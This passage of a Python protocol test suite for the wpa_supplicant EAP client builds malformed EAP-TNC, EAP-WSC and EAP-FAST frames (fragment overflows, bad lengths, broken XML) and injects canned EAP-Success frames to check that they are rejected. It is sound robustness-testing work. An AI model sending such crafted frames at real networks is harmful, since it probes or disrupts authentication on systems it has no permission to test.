logger.info("Test: Fragmentation and unexpected payload in ack")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x01)
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBHBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 1,
EAP_TYPE_TNC, 0x01, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Server fragmenting and fragment overflow")
return struct.pack(">BBHBBLB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4 + 1,
EAP_TYPE_TNC, 0xe1, 2, 1)
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2,
EAP_TYPE_TNC, 0x01, 2, 3)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Server fragmenting and no message length in a fragment")
return struct.pack(">BBHBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 1,
EAP_TYPE_TNC, 0x61, 2)
idx += 1
if ctx['num'] == idx:
logger.info("Test: TNC start followed by invalid TNCCS-Batch")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Received TNCCS-Batch: " + req[6:])
resp = "FOO"
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(resp),
EAP_TYPE_TNC, 0x01) + resp
idx += 1
if ctx['num'] == idx:
logger.info("Test: TNC start followed by invalid TNCCS-Batch (2)")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Received TNCCS-Batch: " + req[6:])
resp = "</TNCCS-Batch><TNCCS-Batch>"
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(resp),
EAP_TYPE_TNC, 0x01) + resp
idx += 1
if ctx['num'] == idx:
logger.info("Test: TNCCS-Batch missing BatchId attribute")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Received TNCCS-Batch: " + req[6:])
resp = "<TNCCS-Batch foo=3></TNCCS-Batch>"
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(resp),
EAP_TYPE_TNC, 0x01) + resp
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected IF-TNCCS BatchId")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Received TNCCS-Batch: " + req[6:])
resp = "<TNCCS-Batch BatchId=123456789></TNCCS-Batch>"
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(resp),
EAP_TYPE_TNC, 0x01) + resp
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing IMC-IMV-Message and TNCC-TNCS-Message end tags")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Received TNCCS-Batch: " + req[6:])
resp = "<TNCCS-Batch BatchId=2><IMC-IMV-Message><TNCC-TNCS-Message></TNCCS-Batch>"
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(resp),
EAP_TYPE_TNC, 0x01) + resp
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing IMC-IMV-Message and TNCC-TNCS-Message Type")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Received TNCCS-Batch: " + req[6:])
resp = "<TNCCS-Batch BatchId=2><IMC-IMV-Message></IMC-IMV-Message><TNCC-TNCS-Message></TNCC-TNCS-Message></TNCCS-Batch>"
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(resp),
EAP_TYPE_TNC, 0x01) + resp
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing TNCC-TNCS-Message XML end tag")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Received TNCCS-Batch: " + req[6:])
resp = "<TNCCS-Batch BatchId=2><TNCC-TNCS-Message><Type>00000001</Type><XML></TNCC-TNCS-Message></TNCCS-Batch>"
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(resp),
EAP_TYPE_TNC, 0x01) + resp
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing TNCC-TNCS-Message Base64 start tag")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Received TNCCS-Batch: " + req[6:])
resp = "<TNCCS-Batch BatchId=2><TNCC-TNCS-Message><Type>00000001</Type></TNCC-TNCS-Message></TNCCS-Batch>"
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(resp),
EAP_TYPE_TNC, 0x01) + resp
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing TNCC-TNCS-Message Base64 end tag")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Received TNCCS-Batch: " + req[6:])
resp = "<TNCCS-Batch BatchId=2><TNCC-TNCS-Message><Type>00000001</Type><Base64>abc</TNCC-TNCS-Message></TNCCS-Batch>"
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(resp),
EAP_TYPE_TNC, 0x01) + resp
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: TNCC-TNCS-Message Base64 message")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Received TNCCS-Batch: " + req[6:])
resp = "<TNCCS-Batch BatchId=2><TNCC-TNCS-Message><Type>00000001</Type><Base64>aGVsbG8=</Base64></TNCC-TNCS-Message></TNCCS-Batch>"
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(resp),
EAP_TYPE_TNC, 0x01) + resp
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid TNCC-TNCS-Message XML message")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Received TNCCS-Batch: " + req[6:])
resp = "<TNCCS-Batch BatchId=2><TNCC-TNCS-Message><Type>00000001</Type><XML>hello</XML></TNCC-TNCS-Message></TNCCS-Batch>"
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(resp),
EAP_TYPE_TNC, 0x01) + resp
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing TNCCS-Recommendation type")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Received TNCCS-Batch: " + req[6:])
resp = '<TNCCS-Batch BatchId=2><TNCC-TNCS-Message><Type>00000001</Type><XML><TNCCS-Recommendation foo=1></TNCCS-Recommendation></XML></TNCC-TNCS-Message></TNCCS-Batch>'
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(resp),
EAP_TYPE_TNC, 0x01) + resp
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: TNCCS-Recommendation type=none")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Received TNCCS-Batch: " + req[6:])
resp = '<TNCCS-Batch BatchId=2><TNCC-TNCS-Message><Type>00000001</Type><XML><TNCCS-Recommendation type="none"></TNCCS-Recommendation></XML></TNCC-TNCS-Message></TNCCS-Batch>'
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(resp),
EAP_TYPE_TNC, 0x01) + resp
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: TNCCS-Recommendation type=isolate")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Received TNCCS-Batch: " + req[6:])
resp = '<TNCCS-Batch BatchId=2><TNCC-TNCS-Message><Type>00000001</Type><XML><TNCCS-Recommendation type="isolate"></TNCCS-Recommendation></XML></TNCC-TNCS-Message></TNCCS-Batch>'
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(resp),
EAP_TYPE_TNC, 0x01) + resp
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
logger.info("No more test responses available - test case completed")
global eap_proto_tnc_test_done
eap_proto_tnc_test_done = True
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
srv = start_radius_server(tnc_handler)
try:
hapd = start_ap(apdev[0]['ifname'])
i = 0
while not eap_proto_tnc_test_done:
i += 1
logger.info("Running connection iteration %d" % i)
frag = 1400
if i == 8:
frag = 150
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="TNC", identity="tnc", fragment_size=str(frag),
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD",
"CTRL-EVENT-EAP-STATUS"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP method start")
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected(timeout=1)
dev[0].dump_monitor()
finally:
stop_radius_server(srv)
def test_eap_canned_success_after_identity(dev, apdev):
    """EAP protocol tests for canned EAP-Success after identity"""
    check_eap_capa(dev[0], "MD5")
    def eap_canned_success_handler(ctx, req):
        # RADIUS-side EAP handler: replies with a canned EAP-Success right
        # after the Identity exchange, for both connection attempts below.
        logger.info("eap_canned_success_handler - RX " + req.encode("hex"))
        # ctx persists across calls: 'num' counts received requests and
        # selects the test step, 'id' is the EAP identifier for the reply.
        if 'num' not in ctx:
            ctx['num'] = 0
        ctx['num'] = ctx['num'] + 1
        if 'id' not in ctx:
            ctx['id'] = 1
        ctx['id'] = (ctx['id'] + 1) % 256
        idx = 0
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Success")
            # Bare EAP-Success header (code, id, length) with no method run
            return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Success")
            return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'], 4)
        return None
    srv = start_radius_server(eap_canned_success_handler)
    try:
        hapd = start_ap(apdev[0]['ifname'])
        # With allow_canned_success=1 the peer must accept the early success.
        dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                       phase1="allow_canned_success=1",
                       eap="MD5", identity="user", password="password",
                       wait_connect=False)
        ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=15)
        if ev is None:
            raise Exception("Timeout on EAP success")
        dev[0].request("REMOVE_NETWORK all")
        dev[0].wait_disconnected()
        # Without the phase1 override the canned success must be ignored.
        dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                       eap="MD5", identity="user", password="password",
                       wait_connect=False)
        ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=5)
        if ev is None:
            raise Exception("Timeout on EAP start")
        ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=0.1)
        if ev is not None:
            raise Exception("Unexpected EAP success")
        dev[0].request("REMOVE_NETWORK all")
        dev[0].wait_disconnected()
    finally:
        stop_radius_server(srv)
def test_eap_proto_wsc(dev, apdev):
    """EAP-WSC protocol tests"""
    global eap_proto_wsc_test_done, eap_proto_wsc_wait_failure
    eap_proto_wsc_test_done = False
    def wsc_handler(ctx, req):
        # RADIUS-side EAP handler driving one malformed/valid EAP-WSC frame
        # per received request. Each request below is: EAP header
        # (code/id/len), expanded type with vendor 0x00372a (WFA) and
        # vendor type 1 (SimpleConfig), then Op-Code, Flags and optional
        # Message Length / payload bytes.
        logger.info("wsc_handler - RX " + req.encode("hex"))
        if 'num' not in ctx:
            ctx['num'] = 0
        ctx['num'] += 1
        if 'id' not in ctx:
            ctx['id'] = 1
        ctx['id'] = (ctx['id'] + 1) % 256
        idx = 0
        global eap_proto_wsc_wait_failure
        eap_proto_wsc_wait_failure = False
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Missing Flags field")
            return struct.pack(">BBHB3BLB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4 + 1,
                               EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
                               1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Message underflow (missing Message Length field)")
            return struct.pack(">BBHB3BLBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4 + 2,
                               EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
                               1, 0x02)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid Message Length (> 50000)")
            return struct.pack(">BBHB3BLBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4 + 4,
                               EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
                               1, 0x02, 65535)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid Message Length (< current payload)")
            return struct.pack(">BBHB3BLBBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4 + 5,
                               EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
                               1, 0x02, 0, 0xff)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected Op-Code 5 in WAIT_START state")
            return struct.pack(">BBHB3BLBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4 + 2,
                               EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
                               5, 0x00)
        idx += 1
        if ctx['num'] == idx:
            # Op-Code 1 = WSC Start; each Start begins a fresh sequence for
            # the next negative test on a new connection iteration.
            logger.info("Test: Valid WSC Start to start the sequence")
            return struct.pack(">BBHB3BLBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4 + 2,
                               EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
                               1, 0x00)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: No Message Length field in a fragmented packet")
            return struct.pack(">BBHB3BLBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4 + 2,
                               EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
                               4, 0x01)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid WSC Start to start the sequence")
            return struct.pack(">BBHB3BLBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4 + 2,
                               EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
                               1, 0x00)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid first fragmented packet")
            return struct.pack(">BBHB3BLBBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4 + 5,
                               EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
                               4, 0x03, 10, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected Op-Code 5 in fragment (expected 4)")
            return struct.pack(">BBHB3BLBBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4 + 3,
                               EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
                               5, 0x01, 2)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid WSC Start to start the sequence")
            return struct.pack(">BBHB3BLBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4 + 2,
                               EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
                               1, 0x00)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid first fragmented packet")
            return struct.pack(">BBHB3BLBBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4 + 5,
                               EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
                               4, 0x03, 2, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Fragment overflow")
            return struct.pack(">BBHB3BLBBBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4 + 4,
                               EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
                               4, 0x01, 2, 3)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid WSC Start to start the sequence")
            return struct.pack(">BBHB3BLBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4 + 2,
                               EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
                               1, 0x00)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected Op-Code 5 in WAIT_FRAG_ACK state")
            return struct.pack(">BBHB3BLBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4 + 2,
                               EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
                               5, 0x00)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid WSC Start")
            return struct.pack(">BBHB3BLBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4 + 2,
                               EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
                               1, 0x00)
        idx += 1
        if ctx['num'] == idx:
            logger.info("No more test responses available - test case completed")
            global eap_proto_wsc_test_done
            eap_proto_wsc_test_done = True
            eap_proto_wsc_wait_failure = True
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
    srv = start_radius_server(wsc_handler)
    try:
        hapd = start_ap(apdev[0]['ifname'])
        i = 0
        # Reconnect repeatedly until the handler has walked all test steps.
        while not eap_proto_wsc_test_done:
            i += 1
            logger.info("Running connection iteration %d" % i)
            # Iteration 9 uses a tiny fragment size to force peer-side
            # fragmentation of its response.
            fragment_size = 1398 if i != 9 else 50
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", eap="WSC",
                           fragment_size=str(fragment_size),
                           identity="WFA-SimpleConfig-Enrollee-1-0",
                           phase1="pin=12345670",
                           scan_freq="2412", wait_connect=False)
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD"], timeout=5)
            if ev is None:
                raise Exception("Timeout on EAP method start")
            if eap_proto_wsc_wait_failure:
                ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=5)
                if ev is None:
                    raise Exception("Timeout on EAP failure")
            else:
                time.sleep(0.1)
            dev[0].request("REMOVE_NETWORK all")
            dev[0].wait_disconnected(timeout=1)
            dev[0].dump_monitor()
    finally:
        stop_radius_server(srv)
def test_eap_canned_success_before_method(dev, apdev):
    """EAP protocol tests for canned EAP-Success before any method"""
    # Bring up an AP with the integrated EAP server and take over the EAPOL
    # frame exchange so a canned EAP-Success can be injected by hand.
    hapd = hostapd.add_ap(apdev[0]['ifname'], int_eap_server_params())
    hapd.request("SET ext_eapol_frame_io 1")
    wpas = dev[0]
    wpas.connect("test-wpa2-eap", key_mgmt="WPA-EAP", scan_freq="2412",
                 phase1="allow_canned_success=1",
                 eap="MD5", identity="user", password="password",
                 wait_connect=False)
    if hapd.wait_event(["EAPOL-TX"], timeout=10) is None:
        raise Exception("Timeout on EAPOL-TX from hostapd")
    # Inject an EAP-Success frame before any EAP method has been started;
    # with allow_canned_success=1 the supplicant must accept it.
    bssid = apdev[0]['bssid']
    if "OK" not in wpas.request("EAPOL_RX " + bssid + " 0200000403020004"):
        raise Exception("EAPOL_RX to wpa_supplicant failed")
    if wpas.wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=5) is None:
        raise Exception("Timeout on EAP success")
    wpas.request("REMOVE_NETWORK all")
    wpas.wait_disconnected()
def test_eap_canned_failure_before_method(dev, apdev):
    """EAP protocol tests for canned EAP-Failure before any method"""
    # Bring up an AP with the integrated EAP server and take over the EAPOL
    # frame exchange so a canned EAP-Failure can be injected by hand.
    hapd = hostapd.add_ap(apdev[0]['ifname'], int_eap_server_params())
    hapd.request("SET ext_eapol_frame_io 1")
    wpas = dev[0]
    wpas.connect("test-wpa2-eap", key_mgmt="WPA-EAP", scan_freq="2412",
                 phase1="allow_canned_success=1",
                 eap="MD5", identity="user", password="password",
                 wait_connect=False)
    if hapd.wait_event(["EAPOL-TX"], timeout=10) is None:
        raise Exception("Timeout on EAPOL-TX from hostapd")
    # Inject an EAP-Failure frame before any EAP method has been started.
    bssid = apdev[0]['bssid']
    if "OK" not in wpas.request("EAPOL_RX " + bssid + " 0200000404020004"):
        raise Exception("EAPOL_RX to wpa_supplicant failed")
    if wpas.wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=5) is None:
        raise Exception("Timeout on EAP failure")
    wpas.request("REMOVE_NETWORK all")
    wpas.wait_disconnected()
def test_eap_nak_oom(dev, apdev):
    """EAP-Nak OOM"""
    check_eap_capa(dev[0], "MD5")
    hostapd.add_ap(apdev[0]['ifname'],
                   hostapd.wpa2_eap_params(ssid="eap-test"))
    # Trigger an allocation failure in the EAP-Nak builder during connect
    # and verify the supplicant survives it.
    with alloc_fail(dev[0], 1, "eap_msg_alloc;eap_sm_buildNak"):
        dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                       eap="MD5", identity="sake user", password="password",
                       wait_connect=False)
        wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
        dev[0].request("REMOVE_NETWORK all")
        dev[0].wait_disconnected()
def test_eap_nak_expanded(dev, apdev):
    """EAP-Nak with expanded method"""
    check_eap_capa(dev[0], "MD5")
    check_eap_capa(dev[0], "VENDOR-TEST")
    hostapd.add_ap(apdev[0]['ifname'],
                   hostapd.wpa2_eap_params(ssid="eap-test"))
    dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                   eap="VENDOR-TEST WSC",
                   identity="sake user", password="password",
                   wait_connect=False)
    # A NAK must be reported for the server's proposed method and the
    # attempt must then end in EAP-Failure.
    proposed = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
                                 timeout=10)
    if proposed is None or "NAK" not in proposed:
        raise Exception("No NAK event seen")
    if dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=10) is None:
        raise Exception("No EAP-Failure seen")
    dev[0].request("REMOVE_NETWORK all")
    dev[0].wait_disconnected()
# EAP-FAST Phase 2 TLV types, used to build the test payloads below.
EAP_TLV_RESULT_TLV = 3
EAP_TLV_NAK_TLV = 4
EAP_TLV_ERROR_CODE_TLV = 5
EAP_TLV_CONNECTION_BINDING_TLV = 6
EAP_TLV_VENDOR_SPECIFIC_TLV = 7
EAP_TLV_URI_TLV = 8
EAP_TLV_EAP_PAYLOAD_TLV = 9
EAP_TLV_INTERMEDIATE_RESULT_TLV = 10
EAP_TLV_PAC_TLV = 11
EAP_TLV_CRYPTO_BINDING_TLV = 12
EAP_TLV_CALLING_STATION_ID_TLV = 13
EAP_TLV_CALLED_STATION_ID_TLV = 14
EAP_TLV_NAS_PORT_TYPE_TLV = 15
EAP_TLV_SERVER_IDENTIFIER_TLV = 16
EAP_TLV_IDENTITY_TYPE_TLV = 17
EAP_TLV_SERVER_TRUSTED_ROOT_TLV = 18
EAP_TLV_REQUEST_ACTION_TLV = 19
EAP_TLV_PKCS7_TLV = 20
# Result/Intermediate-Result TLV status values
EAP_TLV_RESULT_SUCCESS = 1
EAP_TLV_RESULT_FAILURE = 2
# Bits of the 16-bit TLV type field: mandatory flag and type mask
EAP_TLV_TYPE_MANDATORY = 0x8000
EAP_TLV_TYPE_MASK = 0x3fff
# PAC TLV attribute types (EAP-FAST provisioning)
PAC_TYPE_PAC_KEY = 1
PAC_TYPE_PAC_OPAQUE = 2
PAC_TYPE_CRED_LIFETIME = 3
PAC_TYPE_A_ID = 4
PAC_TYPE_I_ID = 5
PAC_TYPE_A_ID_INFO = 7
PAC_TYPE_PAC_ACKNOWLEDGEMENT = 8
PAC_TYPE_PAC_INFO = 9
PAC_TYPE_PAC_TYPE = 10
def eap_fast_start(ctx):
    """Build an EAP-FAST/Start request carrying a 16-byte A-ID TLV."""
    logger.info("Send EAP-FAST/Start")
    # EAP header + method type + flags + A-ID TLV header + 16-byte A-ID
    total_len = 4 + 1 + 1 + 4 + 16
    # Flags 0x21: Start bit set, EAP-FAST version 1 (RFC 4851)
    header = struct.pack(">BBHBBHH", EAP_CODE_REQUEST, ctx['id'], total_len,
                         EAP_TYPE_FAST, 0x21, 4, 16)
    return header + 'A' * 16
def test_eap_fast_proto(dev, apdev):
    """EAP-FAST Phase protocol testing"""
    check_eap_capa(dev[0], "FAST")
    global eap_fast_proto_ctx
    eap_fast_proto_ctx = None
    def eap_handler(ctx, req):
        # RADIUS-side EAP handler: send EAP-FAST/Start, then bogus TLS
        # data that must make the peer's TLS processing fail, then close
        # the exchange with EAP-Failure.
        logger.info("eap_handler - RX " + req.encode("hex"))
        if 'num' not in ctx:
            ctx['num'] = 0
        ctx['num'] = ctx['num'] + 1
        if 'id' not in ctx:
            ctx['id'] = 1
        ctx['id'] = (ctx['id'] + 1) % 256
        idx = 0
        global eap_fast_proto_ctx
        eap_fast_proto_ctx = ctx
        ctx['test_done'] = False
        idx += 1
        if ctx['num'] == idx:
            return eap_fast_start(ctx)
        idx += 1
        if ctx['num'] == idx:
            logger.info("EAP-FAST: TLS processing failed")
            data = 'ABCDEFGHIK'
            return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + len(data),
                               EAP_TYPE_FAST, 0x01) + data
        idx += 1
        if ctx['num'] == idx:
            ctx['test_done'] = True
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        logger.info("Past last test case")
        return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
    srv = start_radius_server(eap_handler)
    try:
        hapd = start_ap(apdev[0]['ifname'])
        dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                       eap="FAST", anonymous_identity="FAST",
                       identity="user", password="password",
                       ca_cert="auth_serv/ca.pem", phase2="auth=MSCHAPV2",
                       phase1="fast_provisioning=1",
                       pac_file="blob://fast_pac_proto",
                       wait_connect=False)
        ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD"], timeout=5)
        if ev is None:
            raise Exception("Could not start EAP-FAST")
        # Poll (up to ~5 s) for the handler to report the sequence done.
        ok = False
        for i in range(100):
            if eap_fast_proto_ctx:
                if eap_fast_proto_ctx['test_done']:
                    ok = True
                    break
            time.sleep(0.05)
        dev[0].request("REMOVE_NETWORK all")
        dev[0].wait_disconnected()
        # Fix: 'ok' was computed but never checked, so a stalled exchange
        # passed silently. Fail explicitly, as run_eap_fast_phase2() does.
        if not ok:
            raise Exception("EAP-FAST test sequence did not complete")
    finally:
        stop_radius_server(srv)
def run_eap_fast_phase2(dev, test_payload, test_failure=True):
    """Run one EAP-FAST exchange, injecting test_payload as Phase 2 data.

    A minimal TLS server (anonymous DH, so no certificate is needed) is
    driven through pyOpenSSL memory BIOs; once the handshake completes,
    test_payload is sent as tunneled application data. If test_failure is
    True, an EAP-Failure follows and the peer is expected to fail.
    """
    global eap_fast_proto_ctx
    eap_fast_proto_ctx = None
    def ssl_info_callback(conn, where, ret):
        logger.debug("SSL: info where=%d ret=%d" % (where, ret))
